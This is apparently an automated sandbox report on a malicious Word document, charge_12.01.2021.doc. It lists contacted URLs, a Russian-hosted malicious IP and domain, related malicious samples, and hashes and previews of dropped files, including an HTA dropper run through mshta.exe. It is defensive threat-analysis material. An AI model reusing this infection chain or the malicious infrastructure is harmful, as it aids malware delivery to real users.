                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://login.windows.net/common/oauth2/authorizeTWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonTWINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/6WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://login.windows.net/common/oauth2/authorizeUWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://entitlement.diagnostics.office.com7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                                                          high
                                                                                                          https://login.windows.net/common/oauth2/authorizeHWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                                                              high
                                                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-askszWINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                https://login.windows.net/common/oauth2/authorizeJWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://outlook.office.com/WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571452806.0000000010A0E000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415190999.0000000010A0A000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                                                                    high
                                                                                                                    https://login.windows.net/common/oauth2/authorizeKWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://storage.live.com/clientlogs/uploadlocation7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorizeOWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          https://substrate.office.com/search/api/v1/SearchHistory7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                                                                            high

                                                                                                                                                      Contacted IPs


                                                                                                                                                      Public

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
194.62.42.207 | winrentals2017b.com | Russian Federation | | 34464 | ZEISS-ASRU | false

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                      Analysis ID:532355
                                                                                                                                                      Start date:02.12.2021
                                                                                                                                                      Start time:04:25:58
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 6m 2s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:light
                                                                                                                                                      Sample file name:charge_12.01.2021.doc
                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                                      Number of analysed new started processes analysed:25
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • GSI enabled (VBA)
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal100.expl.evad.winDOC@8/16@1/1
                                                                                                                                                      EGA Information:Failed
                                                                                                                                                      HDC Information:Failed
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found application associated with file extension: .doc
                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                      • Scroll down
                                                                                                                                                      • Close Viewer
                                                                                                                                                      Warnings:
                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 52.109.6.42, 52.109.8.25, 52.109.76.33
                                                                                                                                                      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, prod-w.nexus.live.com.akadns.net, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, us.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/532355/sample/charge_12.01.2021.doc

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      No simulations

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

Match | Associated Sample Name / URL | Detection | Context
194.62.42.207 | charge_12.01.2021.doc | malicious |

                                                                                                                                                        Domains

                                                                                                                                                        No context

                                                                                                                                                        ASN

Match | Associated Sample Name / URL | Detection | Context
ZEISS-ASRU | charge_12.01.2021.doc | malicious | 194.62.42.207
ZEISS-ASRU | legal agreement 11.15.2021.doc | malicious | 194.62.42.147
ZEISS-ASRU | legal agreement 11.15.2021.doc | malicious | 194.62.42.147
ZEISS-ASRU | legal agreement 11.15.2021.doc | malicious | 194.62.42.147
ZEISS-ASRU | files_11.15.2021.doc | malicious | 194.62.42.148
ZEISS-ASRU | files_11.15.2021.doc | malicious | 194.62.42.148
ZEISS-ASRU | files_11.15.2021.doc | malicious | 194.62.42.148
ZEISS-ASRU | instruct_11.21.doc.docm | malicious | 194.62.42.144
ZEISS-ASRU | instruct_11.21.doc.docm | malicious | 194.62.42.144
ZEISS-ASRU | instruct_11.21.doc.docm | malicious | 194.62.42.144
ZEISS-ASRU | particulars 11.010.2021.doc | malicious | 194.62.42.144
ZEISS-ASRU | particulars 11.010.2021.doc | malicious | 194.62.42.144
ZEISS-ASRU | inquiry-11.21.doc | malicious | 194.62.42.45
ZEISS-ASRU | inquiry-11.21.doc | malicious | 194.62.42.45
ZEISS-ASRU | inquiry-11.21.doc | malicious | 194.62.42.45
ZEISS-ASRU | bE5TVG6QkV.docm | malicious | 194.62.42.31
ZEISS-ASRU | bE5TVG6QkV.docm | malicious | 194.62.42.31
ZEISS-ASRU | pZt5P80bs1.docm | malicious | 194.62.42.143
ZEISS-ASRU | pZt5P80bs1.docm | malicious | 194.62.42.143
ZEISS-ASRU | jk2BhrWvzs.docm | malicious | 194.62.42.144

                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                        No context

                                                                                                                                                        Dropped Files

                                                                                                                                                        No context

                                                                                                                                                        Created / dropped Files

                                                                                                                                                        C:\Users\Public\dowNext.jpg
                                                                                                                                                        Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):203
                                                                                                                                                        Entropy (8bit):5.150186571388359
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3/ZKCezocKqD:J0+oxBeRmR9etdzRx/Fez1T
                                                                                                                                                        MD5:B5FF4C0F214FDF079AE6D835F046B7C5
                                                                                                                                                        SHA1:FC1F09A696C92D366E4868A35A5AFA79129B12BE
                                                                                                                                                        SHA-256:AAF04ECB4C67DE5A7833184F5ABEEC5F48A2FC17BB8167637A421596E00C7E4C
                                                                                                                                                        SHA-512:5DCFA31DD1A704AE698673763A2C3E96F0C7E70D06D4790033B6ECCAFF7E6A55D7D4F2913649915E1AD430E4FA9C68143D82A95A38C2B0BC315AD91099AEAB3A
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "cab3" was not found on this server.</p>.</body></html>.
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\7CC1B43E-0D2C-47F4-8AD2-E8873A50A321
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):140143
                                                                                                                                                        Entropy (8bit):5.358582751621857
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:ATcQIfgxrBdA3gBwtnQ9DQW+z2b4Ff7nXbovidXiE6LWmE9:OuQ9DQW+zNXfH
                                                                                                                                                        MD5:AA85D150EFA81D45B8E01C7655A63F39
                                                                                                                                                        SHA1:E5E24EE468337330B0B0F3B3C6D83DD9ECD0A728
                                                                                                                                                        SHA-256:961C676BA71CE00825B84DD929762CDE6BDA9629430B0274C970B3A230689A68
                                                                                                                                                        SHA-512:84CDC0E5FE3E7BBDE5EF15F106695A7249294AAA8948A168A8623FDE0A4507AFE26128E7AC0706F13B7DACE7F4396D13706A8C89903C3A4F79C6DA282B2E6CBB
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-12-02T03:26:55">.. Build: 16.0.14715.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7E8CFCDF.gif
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:GIF image data, version 89a, 774 x 198
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):14327
                                                                                                                                                        Entropy (8bit):7.959467120915826
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:3j0EEYpcVhE1ltmTV/YZO4NSCWl822TnU0:w02VWnZdw9822zv
                                                                                                                                                        MD5:76DA3E2154587DD3D69A81FCDB0C7364
                                                                                                                                                        SHA1:0F23E27B3A456B22A11D3FBC3132397B0DDC9357
                                                                                                                                                        SHA-256:F9299AB3483A8F729B2ACA2111B46E9952D4491AC66124FEC22C1C789EBC3139
                                                                                                                                                        SHA-512:A20BA525941043701E8DA5234A286FF2AF0A5F4C45998F1BA3BD59785FF4CDDAA72DE316D0BC651C68F30A6587741539B51D356BF5D6FEEAFCAE492AB277BB45
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{982F1FC3-FE5F-460D-815F-F7FB76116FDC}.tmp
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):32768
                                                                                                                                                        Entropy (8bit):3.5800373733053688
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:rtC/c8r5cBp19v3+DQM7wbwM8N0jHa3tC/c8r5cBp19v3+DQM7wbwM8N0jHa:rtmcmkv+Mvj8N0jatmcmkv+Mvj8N0j
                                                                                                                                                        MD5:656F3FFE587050FF48DD81534AF89B09
                                                                                                                                                        SHA1:0BC83FB630A03C21635C5A2A7F9212E015E36B2E
                                                                                                                                                        SHA-256:FC203C64D2FEA74635495706932CED455543759E42FC97A1F7CEB50B7AF8CA98
                                                                                                                                                        SHA-512:64EA804B6BB0950719BB698E98EAE1062B9D316C56875D463B339BC11C611EC76F152E27663487ABD333754B00110476EB480C560223251D797F5928580E314B
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{72E38456-4F34-4E52-A3A7-A6E417760002}.tmp
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1024
                                                                                                                                                        Entropy (8bit):0.05390218305374581
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{D7038A18-F087-45E8-BEBC-452C84E30D87}.tmp
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):21070
                                                                                                                                                        Entropy (8bit):2.7051724386748672
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:UlKV5yQOUVTs4SULwZ4pPVqHoVTQCOiTY5qFQ5q9eH4TsssHsU9YsqYjQYxtYn9q:ZGQOUVTs4SULwZ4pPVqHoVTQCOiThFJI
                                                                                                                                                        MD5:F21872093625D2BA00E54A3D108AF87C
                                                                                                                                                        SHA1:863CA8B13F268B27CCE55FB2529F6DEB0E3F7FAD
                                                                                                                                                        SHA-256:415D7D16904A8DEFC4E43F7B987E07C6DE35129DA74C02EDF24AA2D09BBE0D65
                                                                                                                                                        SHA-512:2C9244309A1C5DC95AB46FBEE99599DDE2481FE182665F63E9FA6C2958A930B4B312698B0CE6F941F3B1BA81672472F74CBF72851AEE410386C3BE8DCB0B2FAF
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview: ../.<.@.1.h.@.1.t.@.1.m.@.1.l.@.1.>.@.1.<.@.1.b.@.1.o.@.1.d.@.1.y.@.1.>.@.1.<.@.1.d.@.1.i.@.1.v.@.1. .@.1.i.@.1.d.@.1.=.@.1.'.@.1.k.@.1.a.@.1.r.@.1.o.@.1.l.@.1.Y.@.1.o.@.1.u.@.1.'.@.1. .@.1.s.@.1.t.@.1.y.@.1.l.@.1.e.@.1.=.@.1.'.@.1.f.@.1.o.@.1.n.@.1.t.@.1.-.@.1.c.@.1.o.@.1.l.@.1.o.@.1.r.@.1.:.@.1. .@.1.#.@.1.0.@.1.0.@.1.0.@.1.'.@.1.>.@.1.l.@.1.a.@.1.v.@.1.e.@.1.<.@.1./.@.1.d.@.1.i.@.1.v.@.1.>.@.1.<.@.1.d.@.1.i.@.1.v.@.1. .@.1.i.@.1.d.@.1.=.@.1.'.@.1.t.@.1.u.@.1.b.@.1.e.@.1.G.@.1.i.@.1.r.@.1.l.@.1.'.@.1. ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\cab3[1].htm
                                                                                                                                                        Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):203
                                                                                                                                                        Entropy (8bit):5.150186571388359
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3/ZKCezocKqD:J0+oxBeRmR9etdzRx/Fez1T
                                                                                                                                                        MD5:B5FF4C0F214FDF079AE6D835F046B7C5
                                                                                                                                                        SHA1:FC1F09A696C92D366E4868A35A5AFA79129B12BE
                                                                                                                                                        SHA-256:AAF04ECB4C67DE5A7833184F5ABEEC5F48A2FC17BB8167637A421596E00C7E4C
                                                                                                                                                        SHA-512:5DCFA31DD1A704AE698673763A2C3E96F0C7E70D06D4790033B6ECCAFF7E6A55D7D4F2913649915E1AD430E4FA9C68143D82A95A38C2B0BC315AD91099AEAB3A
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "cab3" was not found on this server.</p>.</body></html>.
                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Documents.LNK
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Thu Dec 2 11:26:58 2021, atime=Thu Sep 23 14:11:48 2021, length=12288, window=hide
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):932
                                                                                                                                                        Entropy (8bit):4.662879866027562
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12:8iwL3BUEuElPCH2NJ/gNIyxPDDYjAX/14yCN1L9L4lC54lu4t2Y+xIBjKZm:8i89JUIyx0AXyv0cm47aB6m
                                                                                                                                                        MD5:6EE53943CF3F6DC9214DB2DB368E7DB9
                                                                                                                                                        SHA1:5F8E447C7919CCE056F0F998B7586273DFC66CD3
                                                                                                                                                        SHA-256:E59EBF58B5419C682A702EB064D8E3E102DE562B1D3B58B7E37C503F3C47AEC4
                                                                                                                                                        SHA-512:74C4B362DE8F48E6DDD8E468707DF1A1447AB7E16EBD53A9B096BF3F1A03A3322DD219A589CD325E18CB81E4E917998D035142C1153D1E329136F98AB60FF96F
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview: L..................F........N....-...:f.w....T.T.....0......................{....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...STc....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....7Svy..user.<.......Ny..STc.....S......................0.h.a.r.d.z.......1.....7Syy..DOCUME~1..l.......Ny..S`c.....Y..............B......j..D.o.c.u.m.e.n.t.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.......G...............-.......F...........>.S......C:\Users\user\Documents........\.....\.....\.....\.....\.D.o.c.u.m.e.n.t.s.............y...............#.F..l.H.i.y...`.......X.......585948...........!a..%.H.VZAj...1.4...........-..!a..%.H.VZAj...1.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\charge_12.01.2021.doc.LNK
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Sep 23 14:11:40 2021, mtime=Thu Dec 2 11:26:56 2021, atime=Thu Dec 2 11:26:52 2021, length=33465, window=hide
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1090
                                                                                                                                                        Entropy (8bit):4.661373937752013
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12:8//vUEuElPCH2NJdgRVTB+WMjXjh96OjAr/c9gm2WDY9Lab5al4t2Y+xIBjKZm:83J+tu5ArpmDimb8X7aB6m
                                                                                                                                                        MD5:D4A1160658A7D6F5CC082B3BD3CFC63E
                                                                                                                                                        SHA1:B7AF3A5834463C6C13DD48E4A5894511683FBE33
                                                                                                                                                        SHA-256:D3F266DED0A278F9D523A15ED1A65EC7B7557EBA271640A8BBD19FEC61BEF1FF
                                                                                                                                                        SHA-512:01A7C637CAA186CEED08D07A432734B707059A6D05C1CA60F22B5303023C7FE221A651E9885249A2210E8427E8DC95645C4D3BC1A12A6B8BCC95BAC8262A6865
                                                                                                                                                        Malicious:true
                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):162
                                                                                                                                                        Entropy (8bit):4.843269680153589
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:bDuMJleWSGCKLbpzC5S/WCEKU0XCmX1a+CGCKLbpzCmxWIMov7QR0XCv:bCES2NzASe70XE+C2NzHUR0Xs
                                                                                                                                                        MD5:E91DD663702EA899117B59C00E489E66
                                                                                                                                                        SHA1:C4B60308DFC7FB795EA64DDD5C52C027E78ABE85
                                                                                                                                                        SHA-256:B509F3B57DB1E87AF3D1A7F07029B123C7D5D3EEBC415145D87A76C58DDC0E48
                                                                                                                                                        SHA-512:3EBD713C14F3C2805DEEF07A6A5D8A6F89CCF5F323BF15AE6499A686BFB6CDABFB834B372D621DF7923D85BD60B99504077D23480587035F0A6AA2AD918A8DD0
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview: [folders]..Templates.LNK=0..charge_12.01.2021.doc.LNK=0..Documents.LNK=0..youTube.hta.LNK=0..[doc]..charge_12.01.2021.doc.LNK=0..[misc??????]..youTube.hta.LNK=0..
                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\youTube.hta.LNK
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Dec 2 11:26:58 2021, mtime=Thu Dec 2 11:26:58 2021, atime=Thu Dec 2 11:26:58 2021, length=3342, window=hide
                                                                                                                                                        Category:modified
                                                                                                                                                        Size (bytes):1066
                                                                                                                                                        Entropy (8bit):4.680764020755961
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12:8J/6A0UEuElPCH2NJ/SIRID9KXGkYjAj/UnIWlyCN1L9L0b50l4t2Y+xIBjKZm:8JjCJaIRAG8AjcIWtvIbiX7aB6m
                                                                                                                                                        MD5:4A5CE92D4E76F708C99714DEF014C41D
                                                                                                                                                        SHA1:DD3DDB06FA749FD03C1103BFF4FEB9D86F9DA491
                                                                                                                                                        SHA-256:104926EDE831E12ACEB4758623EBDB664640553783DB0D6E2E46B0B3E0945CEA
                                                                                                                                                        SHA-512:563C95A1300072A123796B7DE26D274099E3B18E1C81FDE8DDCB5CD7DED21ED392C56336DE482B1B01515A8A6CD90A7DD34E9C22CDBA346B8DA717688CDB3204
                                                                                                                                                        Malicious:true
                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
